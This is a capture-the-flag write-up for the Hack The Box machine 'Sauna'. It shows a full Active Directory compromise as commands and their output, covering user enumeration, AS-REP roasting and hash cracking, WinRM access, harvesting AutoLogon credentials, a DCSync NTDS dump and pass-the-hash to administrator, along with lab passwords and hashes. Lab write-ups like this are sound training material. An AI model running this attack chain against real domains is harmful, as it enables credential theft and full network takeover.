HTB - Sauna
Enumeration
Scope
IP Address: 10.10.10.175
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-07 17:57:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-07T17:57:54
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m06s* Open ports: 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP Open ports: 53 - 123 - 389
* Services: DNS - HTTP - KERBEROS - LDAP - SMB - winRM - NTP
* Versions: IIS httpd 10.0
* Important Notes: EGOTISTICAL-BANK.LOCALEnumeration
DNS
Tried zone transfer
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ dig axfr EGOTISTICAL-BANK.LOCAL @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr EGOTISTICAL-BANK.LOCAL @10.10.10.175
;; global options: +cmd
; Transfer failed.SMB
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
SMB 10.10.10.175 445 SAUNA [-] Error enumerating shares: STATUS_ACCESS_DENIEDRPC
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIEDKerberos
I always try to enumerate usernames if AD exits on the machine
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ kerbrute userenum --dc $ip -d EGOTISTICAL-BANK.LOCAL -t 100 -o users.list /usr/share/seclists/Usernames/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/07/24 - Ronnie Flathers @ropnop
2024/07/07 07:05:40 > Using KDC(s):
2024/07/07 07:05:40 > 10.10.10.175:88
2024/07/07 07:05:41 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2024/07/07 07:05:41 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCALwe got two valid users, I will try ASREPRoasting attack against the two users
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/hsmith -dc-ip $ip -no-pass -request -format hashcat
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Getting TGT for hsmith
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip $ip -no-pass -request -format hashcat
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e94ba92c6e2e5a56c63f6b44b33a7c18$934054420861aec52953b27db93df6188a5c39dac8d5dfcc2c00c40ca44a51e1b6467940418ab567b70dfdc96e66d4c8a3aeb6288361fc6a1b084a8ebc84fcd8c47b6efb23d72ec2464cff922ebf0e1c41ee3226792b828fc81a95f0aae684628ee411817092145b0afd755de3f4c1d548b04b2600ea07ce28ad9fdb941003bdfa158a25018bbef9202a802836244354b746c6fd6f03b94330ca94a0385f3fede5f67c3278d4f550c76c81d1dadc56402a7b592af9ace3cf31b9414f189e4aba55e3808193ebb38a47908fa6766e3933c0dd97009a1ea098f6e2b67d4a51a20b191b64bee6d2403a4b211c3fe748e8bc6475a7ef7bcecb6b79a3155dc02e1bf0Initial Access
we got a hit with one user, then will try to crack it with hashcat
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e94ba92c6e2e5a56c63f6b44b33a7c18$934054420861aec52953b27db93df6188a5c39dac8d5dfcc2c00c40ca44a51e1b6467940418ab567b70dfdc96e66d4c8a3aeb6288361fc6a1b084a8ebc84fcd8c47b6efb23d72ec2464cff922ebf0e1c41ee3226792b828fc81a95f0aae684628ee411817092145b0afd755de3f4c1d548b04b2600ea07ce28ad9fdb941003bdfa158a25018bbef9202a802836244354b746c6fd6f03b94330ca94a0385f3fede5f67c3278d4f550c76c81d1dadc56402a7b592af9ace3cf31b9414f189e4aba55e3808193ebb38a47908fa6766e3933c0dd97009a1ea098f6e2b67d4a51a20b191b64bee6d2403a4b211c3fe748e8bc6475a7ef7bcecb6b79a3155dc02e1bf0:Thestrokes23
Session..........: hashcat
Status...........: CrackedAnd successful :)
I will try to connect to SMB & winRM with the credentials found
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec smb $ip -u 'fsmith' -p 'Thestrokes23'
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec winrm $ip -u 'fsmith' -p 'Thestrokes23'
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ evil-winrm -i $ip -u fsmith -p 'Thestrokes23'
*Evil-WinRM* PS C:\Users\FSmith> type Desktop\user.txt
a0865592caf1d5a2d07d1183aa080f0fUser Flag: a0865592caf1d5a2d07d1183aa080f0f
Privilege Escalation
After obtaining valid credentials, I hurry to bloodhound to enumerate the domain, but before that I updated /etc/hosts to contain the following record
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ tail -n1 /etc/hosts
10.10.10.175 EGOTISTICAL-BANK.LOCAL SAUNA.EGOTISTICAL-BANK.LOCAL┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ bloodhound-python -u 'fsmith' -p 'Thestrokes23' -ns $ip -d EGOTISTICAL-BANK.LOCAL -c all
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: **Connecting** to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCALCreating a .zip file to upload to bloodhound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ zip sauna.zip *.jsonOpening bloodhound with the following commands
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ sudo neo4j start
[sudo] password for kali:
<snip>
Started neo4j (pid:18524). It is available at http://localhost:7474
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ bloodhoundUpload the zip file we created before and began to enumerate the domain
When I clicked List all kerberoatable Accounts I found hsmith listed, So I will request its TGS and try to crack it
I've done this attack, but it didn't reveal anything and
hsmithhad the same password as fsmith and didn't have any privileges we were looking for.
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgrThere is another user on that machine called svc_loanmgr and after looking for it in bloodhound, I realized that I could perform DCSync attack if I had this account.
I moved winpeas.exe to the current folder and uploaded it via evil-winrm = to the machine and run it
*Evil-WinRM* PS C:\Tools> upload winpeas.exe
*Evil-WinRM* PS C:\Tools> .\winpeas.exe
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!We got svc_loanmgr passwords, Let's perform DCSync attack from Linux attack box
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ crackmapexec smb $ip -u svc_loanmgr -p 'Moneymakestheworldgoround!' --ntds
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
SMB 10.10.10.175 445 SAUNA [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.175 445 SAUNA [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.175 445 SAUNA Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70xxxxxxxxxxxe:::
SMB 10.10.10.175 445 SAUNA Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.175 445 SAUNA krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
SMB 10.10.10.175 445 SAUNA EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB 10.10.10.175 445 SAUNA EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB 10.10.10.175 445 SAUNA EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SMB 10.10.10.175 445 SAUNA SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:21505d6dd773d86031623f0b8e8c98ab:::
SMB 10.10.10.175 445 SAUNA [+] Dumped 7 NTDS hashes to /home/kali/.cme/logs/SAUNA_10.10.10.175_2024-07-07_081911.ntds of which 6 were added to the databaseLogin as administrator using impacket-psexec
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/sauna]
└─$ impacket-psexec EGOTISTICAL-BANK.LOCAL/administrator@$ip -hashes :823452073d75b9d1cf70xxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file dPcptKVP.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service tQAK on 10.10.10.175.....
[*] Starting service tQAK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> C:\Windows\system32> cd C:\users\administrator\desktop
C:\Users\Administrator\Desktop> type root.txt
b9955377f34c4330d2f5xxxxxxxxxxxxxxxRoot Flag: b9955377f34c4330d2f5xxxxxxxxxxxxxxx
Last updated
